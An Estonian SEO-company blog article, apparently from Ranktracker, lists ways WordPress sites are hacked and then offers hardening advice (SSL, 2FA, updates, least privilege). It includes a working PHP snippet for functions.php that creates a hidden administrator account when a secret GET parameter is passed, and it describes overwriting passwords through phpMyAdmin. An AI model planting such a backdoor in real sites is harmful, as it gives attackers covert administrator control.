• WordPress

Kuidas häkkida WordPressi?

  • Felix Rose-Collins
  • 7 min read
Kuidas häkkida WordPressi?

Intro

Enne selle artikli alustamist tahaksime teile teada, et häkkimine on ebaseaduslik ja me ei motiveeri ega julgusta pahatahtlikku tegevust. See artikkel on mõeldud üksnes teadmiste saamiseks sellest, kuidas petturid töötavad ja kuidas erinevad saitide turvalisuse meetodid on nende eemalhoidmiseks olulised. Arutleme:

  • Kuidas petturid häkkida WordPress?
  • Kuidas kaitsta oma WP-saiti petturite eest?

Niisiis, ilma pikema jututa, alustame teemaga.

Kuidas häkkida WordPressi veebisaiti veebis?

How to Hack WordPress Website Online (Allikas: wpsecurityninja.com)

WPScan'i kasutamine:

WPScan on WP turvaskanner, mis aitab saidi omanikel kontrollida oma WordPressi saidi haavatavusi, kuid seda skannerit kasutavad ka häkkerid oma motiivide täitmiseks, et häkkida veebisaite.

WPScan võimaldab saidi omanikel ja administraatoritel määrata WP kasutajakontosid ja jõhkraid paroole ning on esmane samm WP-kontodele volitamata juurdepääsu saamisel.

Brute force username and password using WPScan (Brute force kasutajanimi ja parool WPScan'i abil. Allikas: Medium)

MIM-rünnakud:

Man-in-middle (MIM) rünnakuid on lihtne teostada, kui kasutajad kasutavad sarnaseid kohtvõrke. Krüpteerimata kasutajakasutajate sisselogimine on pehme sihtmärk, kuna kõik andmed on nähtavad lihtkirjas.

Sellist tüüpi rünnakute läbiviimisega seotud tarkvara suudab tuvastada ohustatud teemasid, pistikprogramme ja loetleda kasutajaid.

MIM Attacks (Allikas: Medium)

SQL Injections:

SQL-injektsioonirünnakuid peetakse kõige silmapaistvamateks rünnakuteks, mida kasutatakse veebisaitidele tungimiseks. Need rünnakud on suunatud veebisaidi backend-väravatele ja võimaldavad häkkeritel tungida neisse, rakendades kompromiteeritud käske.

SQL Injections (Allikas: secure.wphackedhelp.com)

Meet Ranktracker

Kõik-ühes platvorm tõhusaks SEO-ks

Iga eduka ettevõtte taga on tugev SEO-kampaania. Kuid kuna on olemas lugematu hulk optimeerimisvahendeid ja -tehnikaid, mille hulgast valida, võib olla raske teada, kust alustada. Noh, ärge kartke enam, sest mul on just see, mis aitab. Tutvustan Ranktracker'i kõik-ühes platvormi tõhusaks SEO-ks.

Oleme lõpuks avanud registreerimise Ranktracker täiesti tasuta!

Loo tasuta konto

Või logi sisse oma volituste abil

Need sissetungid võimaldavad häkkeritel muuta andmebaase ja käske ning kustutada või varastada saidi teavet.

Kuna need SQL-rünnakud avastavad haavatavad ja parandamata saidid, teevad nad häkkimise ülesande lihtsaks ja edukaks.

Kasutades My SQL/cPanel:

Selle meetodi puhul loovad häkkerid võltsitud konto või muudavad praeguse WP-saidi kasutaja parooli. Häkkerid üritavad tungida cPaneli kaudu, avades PhpMyAdmin'i. Nad otsivad tabelit, mis lõpeb sõnaga _users, ja leiavad kasutaja, keda nad tahavad muuta.

See võimaldab neil muuta selle kasutaja volitusi, keda nad kavatsevad häkkida. Nad jälgivad kasutajat ja muudavad kasutaja salasõna (väljal user_pass), avades online MD5-generaatori ja asendavad selle oma soovitud parooliga ning hiljem klõpsavad #.

Utilizing My SQL/cPanel (Kasutajanimed, kasutajate räsitud paroolid, nende e-posti tunnused jne on kõik salvestatud wp_users andmebaasi tabelis. Allikas: firstsiteguide.com)

Kasutajanimed, kasutajate räsitud paroolid, nende e-posti tunnused jne on kõik salvestatud wp_users andmebaasi tabelis.

Functions.php redigeerimine:

Häkkerid pääsevad ka cPanelisse, et muuta faili Functions.php. Avades failihalduri, otsivad nad aktiivse teema kausta. Kaustast public_html/wp_content/themes jälgivad nad teemat ja muudavad functions.php, paigutades sinna oma kompromiteeritud koodi. Häkkimine on juba käimas, sest häkkerid on loonud uue konto. Kui see on tehtud, kustutavad nad kompromiteeritud koodi.

Uue kasutajakonto loomine FTP kaudu:

Üldiselt aitavad FTP-kontod saidi omanikel luua oma veebisaidil kataloogi, mis võimaldab konkreetsetel kasutajatel oma faile üles/alla laadida, kasutades nende sisselogimise andmeid.

Neid faile vaadatakse ka internetis.

FTP-konto loomise sammud saidil:

  • Sisestage soovitud andmed
  • Sisestage uue FTP kasutaja kasutajanimi
  • Sisestage parool FTP kaudu juurdepääsu võimaldava konto määramiseks.
  • Sisestage kataloogi nimi FTP kaudu juurdepääsu andmiseks
  • Kirjutage soovitud MB ruumi, mida soovite sellele kaustale eraldada.
  • Hiljem vajutage uue konto loomiseks nuppu "Create ".

FTP kaudu juurdepääsu saamiseks peab uus kasutaja laadima allpool nimetatud andmed.


Aadress / Host Name / Address: yourdomain.com või ftp.yourdomain.com Kasutaja / User: user@yourdomain.com Parool: El parool, mis on määratud sellele FTP-kontole.

Port: 21Failide üleslaadimise/allalaadimise kausta nimi.


Uuel kasutajal on lugemis- ja kirjutamisõigused nii valitud kataloogile kui ka kõigile selles sisalduvatele alamkataloogidele. Näiteks kui te loote kliendikasutaja ja annate talle juurdepääsu kataloogile / home / user / public_html

Tagaukse kaudu tungimine:

Pahatahtlik viis saidile tungimiseks on tagaukse kaudu. Olgu see siis pettur, kes tahab saada juurdepääsu teie saidile, või ohvri kasutaja, kes tahab taastada juurdepääsu oma saidile tagaukse kaudu, mõlemad peavad järgima alljärgnevaid samme.

Meet Ranktracker

Kõik-ühes platvorm tõhusaks SEO-ks

Iga eduka ettevõtte taga on tugev SEO-kampaania. Kuid kuna on olemas lugematu hulk optimeerimisvahendeid ja -tehnikaid, mille hulgast valida, võib olla raske teada, kust alustada. Noh, ärge kartke enam, sest mul on just see, mis aitab. Tutvustan Ranktracker'i kõik-ühes platvormi tõhusaks SEO-ks.

Oleme lõpuks avanud registreerimise Ranktracker täiesti tasuta!

Loo tasuta konto

Või logi sisse oma volituste abil

Juhul, kui FTP kaudu luuakse uus kasutajakonto või tehakse parooli lähtestamine, kuid see ei anna soovitud tulemusi, võib kasutaja soovida häkkida oma saiti tagaukse kaudu ja saada tagasi oma administraatori juurdepääsu.

Sammud tagaukse loomiseks:

  • Avage fail functions.php ja kleepige alljärgnev kood.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Hiljem salvestage muudatused.

Crypto Jacking & Cryptocurrency Mining:

Krüptovaluutade populaarsus on tekitanud uusi küberohtusid, nagu krüptokaevandamine, mida nimetatakse ka krüptoraha kaevandamise pahavaraks.

Arvuti konfiskeerimist kasutaja tahte ja teadlikkuse vastaselt nimetatakse krüptokaaperdamiseks. Krüptovarguse pahavara puhul nakatavad petturid kasutaja arvuti pahatahtliku pahavara, mis edastatakse süsteemide ja võrkude ohustamiseks mõeldud tarkvara kaudu.

Phishing:

Phishing on meetod, mille puhul petturid petavad kasutajatelt nende tundlikke andmeid (sisselogimise andmed, sotsiaalkonto number, PIN-kood, krediitkaardi andmed jne), andes end juriidiliste isikutena välja. Tavaliselt kasutavad nad oma eesmärgi täitmiseks e-kirju.

Näide: Samuti võib ta panna andmepüügi e-kirjale halva lingi ja suunata kasutajaid mõnele pettuse kohasele saitidele, et edastada pahavara.

Pahavara:

WordPress Security Statistika näitab, et 4000 WP veebilehed on nakatunud pahavara tõttu võlts SEO pluginad.

Petturid ei vaja pahavara edastamiseks allikat. SEO-pistikprogrammid, WP-teemad ja paljud muud saidil esinevad tegurid on motiveerinud häkkerid kasutama hiljutist WP-VCD pahavara.

Isegi andmepüügi e-kirjad on väravad pahavara edastamiseks.

Ka siin on häkkerite moto sama, st saada kasutajatelt tundlikke andmeid, tungides süsteemidesse ja varastades teavet.

WordPress Ransomware:

WP lunavara puhul kasutavad häkkerid pahavara, et blokeerida kasutajate juurdepääs süsteemidele ja võrkudele. Sama saab kasutaja taastada, makstes häkkerite poolt nõutud lunaraha.

Näide: Petya rünnak, mille puhul häkker krüpteerib teie failid ja andmed ning nõuab lunaraha dekrüpteerimisvõtme eest.

XSS (Cross-Site Scripting) rünnak:

XSS-rünnakuid viivad häkkerid läbi, sisestades veebilehele pahatahtlikku sisu, kasutades seega ära veebilehitsejat. See rünnak võimaldab häkkeril varastada andmeid küpsistest, muuta saidi sisu ja haarata veebilehte tundlike andmete saamiseks.

Clickjacking:

Clickjacking'i puhul teeb häkker pahatahtliku katse kompromiteerida nuppu/linki ja motiveerib kasutajat klõpsama kompromiteeritud objektil. See võimaldab häkkeril täita pahatahtlikke käske, et pääseda ligi kasutaja tundlikele andmetele.

Spoofing:

Spoofing on rünnak, mille puhul isik maskeerib end usaldusväärseks identiteediks, et saada ebaseaduslikku kasu kasutajalt ja petta teda oma konfidentsiaalsete andmete esitamiseks.

Kõigi nende häkkerirünnakute vältimiseks tuleb võtta spetsiaalsed turvameetmed, et kaitsta oma WP-veebisaiti.

Kuidas kaitsta WordPressi veebisaiti häkkimisest?

How to Secure WordPress Website from Hacking? (Allikas: envisagedigital.co.uk)

Ülaltoodud statistika on piisav, et näidata WordPressi populaarsust. Just see populaarsus muudab selle CMS-platvormi ihaldusväärsemaks häkkerite seas, kes proovivad erinevaid häkkimismeetodeid, et pääseda ligi WP veebilehtedele ja nende andmetele.

Seega on oluline teada, kuidas takistada häkkerite juurdepääsu teie WP-leheküljele.

Kaitske oma WP-sait SSL-sertifikaadiga:

Kui veebilehele laaditakse mis tahes andmeid, on need alati tavalises tekstis, mis on kõigile, sealhulgas häkkeritele, kergesti nähtav. See võib olla ohtlik, sest häkkerid võivad teie saidi andmeid kuritarvitada.

SSL (Secure Socket Layers) sertifikaadid on need digitaalsed sertifikaadid, mis aitavad kaitsta teie WP-saiti 256-bitise krüpteerimisega, muutes seega teie saidi andmed kodeeritud kujul.

Häkkerid ei saa lugeda koode, kuigi nad on saanud juurdepääsu teie saidile ja seega on nad sunnitud sellistelt saitidelt lahkuma.

Secure your WP site with SSL Certificate (Allikas: clickssl.net)

Valige soovitud SSL-sertifikaadi mark (Comodo, Thawte, RapidSSL jne) ja paigaldage see WP-leheküljele. SSL-sertifikaadi tüübi puhul peate mõistma domeene ja alamdomeene. Näiteks kui teie WP-saidil on alamdomeene, siis võib üks odav Wildcard-sertifikaat, mis maksab vaid 45 dollarit aastas, kindlustada kogu teie digitaalset ettevõtet.

Kiire väljastamine, 2048-bitise võtme krüpteerimine, SEO-võimendus, saidi usaldusmärgis, 99% brauserite/mobiilide ühilduvus, tagastamispoliitika ja garantii on mõned Wildcard SSL-sertifikaatide paigaldamise funktsioonid ja eelised.

Mitmesugused SSL-toodete kaubamärgid ja -valikud, eelarvesõbralikud hinnad ja suurepärane klienditeenindus on mõned eelised, mida pakub ClickSSL-i poe poole pöördumine oma WP-saidi kaitsmiseks.

Uuendage oma töötajaid:

Inimlikud eksimused võivad olla katastroofilised, seega veenduge alati, et teie töötajad oleksid alati kursis uusimate küberohtude kohta, et vältida nende haavatavust.

Kui teie töötajad suudavad algstaadiumis jälgida häkitud veebisaidi kahtlasi signaale, saavad nad teavitada asjaomaseid isikuid ja vältida teie veebisaidi ja ettevõtte edasist kahjustamist.

Kasutage kahefaktorilist autentimist (2FA):

2FA rakendamine veebisaidile sisselogimise ajal on kõige olulisem viis brute force'i rünnakute tõrjumiseks. Lisaks sellele, et nad lisavad veel ühe turvakihi, takistavad nad ka saidi ja kasutaja andmete kasutamist.

Selle põhjuseks on see, et kui üks turvakiht on rikutud, peab pettur sisenema teise kihi, et pääseda veebilehele ligi.

See on raske otsus ja seetõttu liiguvad petturid enamikul juhtudest teiste halvasti turvatud saitide juurde.

Vihje: WP 2FA on tasuta WP plugin, mis annab sinu WP-leheküljele täiendava turvakihi.

Regulaarselt auditeerige administraatori kasutajaid:

See on oluline teie WP-saidi turvalisuse seisukohast. Veenduge, et auditeerite oma administraatorite kasutajaid regulaarselt ja kontrollige nende juurdepääsu.

Tagage ka, et teie kasutajatel ja töötajatel oleks piiratud juurdepääs vastavalt nende ülesannetele, et vältida turvaauke.

Värskenda WordPressi tuuma regulaarselt:

Ei ole teadlik WP Core'ist?

Lubage mul teile lühidalt öelda, et WP Core sisaldab kõiki WP tööks vajalikke põhifaile.

WordPress.org-ist alla laaditud WP zip-faili failide loetelu

Update WordPress Core Regularly (Allikas: ithemes.com)

Neid põhifaile tuleb regulaarselt uuendada pärast turvauuenduste avaldamist, et parandada kõiki turvaauke.

Lae WP teemad ja pistikprogrammid usaldusväärsetest allikatest alla:

See on ülioluline, sest pistikprogrammid võivad olla ohtlikud, kui neid ei uuendata või kui need on paigaldatud mitteusaldusväärsetest allikatest. Tasuta/makstud pistikprogrammide kasutamisel kontrollige alati allpool toodud tegureid, nagu:

  • Kasutajate hinnangud ja kommentaarid
  • Kasutajasõbralikkus
  • Ühilduvus
  • Turvalisus
  • Usaldusväärsus

Download WP Themes & Plugins from Trustworthy Sources (Allikas: torquemag.io)

Sama reegel kehtib ka WP teemade paigaldamisel.

WP teemade ja pistikprogrammide korrapärane uuendamine:

Vananenud või aegunud WP teemad ja pistikprogrammid kujutavad alati ohtu teie WP saidile, kuna nad kaotavad oma turvastandardid. Et häkkerid ei saaks selliseid väravaid kasutada pahavara levitamiseks, et saada juurdepääs saidile, veenduge, et uuendate oma WP saidil kasutatavaid teemasid ja pistikprogramme regulaarselt.

See aitab pluginal korralikult toimida ja jääda sünkroonis WP uusimate versioonidega.

Vihje: Iga plugina kõrval on link, mis ütleb "Enable auto-updates" (automaatse uuendamise lubamine). Lülitage see automaatsete uuenduste jaoks sisse.

Muuda vaikimisi administraatori nime:

Häkkerid on liiga targad ja nad saavad hõlpsasti tungida teie WP-lehele, kasutades vaikimisi administraatori nime. Alati eelistatakse muuta vaikimisi admini kasutajanime, et häkkerid ei saaks teostada brute-force rünnakuid, et saada volitamata ligipääs teie veebisaidile.

Piiratud juurdepääsu võimaldamine:

Ärge kunagi andke rohkem kui vaja ja sama reegel kehtib nii kasutajatele kui ka töötajatele juurdepääsu andmisel.

Juurdepääsukontroll on saidi ja andmete turvalisuse tähtsaim reegel, sest see määrab, kes saab või ei saa veebisaidile ligi. Blokeerige kõik sissepääsud WP administraatorile ja muudele kriitilistele koodidele ja andmetele saidi turvalisuse tagamiseks.

Piiratud juurdepääs mitte ainult ei paranda tootlikkust, vaid see kaitseb teie saiti ka pahatahtlike sissekannete eest.

WordPressi uuendamine:

Kui teie WordPressi ei uuendata, on teie saidi puhul oht, et häkkerid tungivad sinna sisse.

WordPress valitseb 37% turuosast ja see jätkab regulaarselt uuenduste väljastamist, et parandada turvaauke ja vigu. Need uuendused sisaldavad ka uusi funktsioone ja olemasolevate parandusi, mis on kasulikud teie saidi jõudluse suurendamiseks.

Meet Ranktracker

Kõik-ühes platvorm tõhusaks SEO-ks

Iga eduka ettevõtte taga on tugev SEO-kampaania. Kuid kuna on olemas lugematu hulk optimeerimisvahendeid ja -tehnikaid, mille hulgast valida, võib olla raske teada, kust alustada. Noh, ärge kartke enam, sest mul on just see, mis aitab. Tutvustan Ranktracker'i kõik-ühes platvormi tõhusaks SEO-ks.

Oleme lõpuks avanud registreerimise Ranktracker täiesti tasuta!

Loo tasuta konto

Või logi sisse oma volituste abil

Why you should always update your wordpress (Allikas: wpbeginner.com)

Hoidke oma WP-saiti ajakohasena, et tagada tugev turvalisus.

Lõpetamine:

Kasutage tugevaid ja keerulisi paroole ning hoidke oma WP-saiti, samuti pluginad ja teemad uuendatud, et parandada kõik turvaaugud. Võtke aega oma töötajate koolitamiseks, sest see aitab alati katastroofe ära hoida.

Ärge kunagi kaotage turvalisust ja veenduge alati, et kasutate parimaid ja usaldusväärseid turvapluginaid, et hoida oma WP-saiti turvaliselt uudishimulike silmade eest. Lisaks kindlustage oma sait SSL-iga, et suurendada klientide usaldust, äri ja SEO-d.

Nüüd, kui olete teadlik sellest, kuidas häkkerid toimivad, loodame, et see artikkel aitab teil vältida häkkerite sissetungi teie saidile ja hallata oma WP-saiti turvaliselt.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Alusta Ranktracker'i kasutamist... Tasuta!

Uuri välja, mis takistab sinu veebisaidi edetabelisse paigutamist.

Loo tasuta konto

Või logi sisse oma volituste abil

Different views of Ranktracker app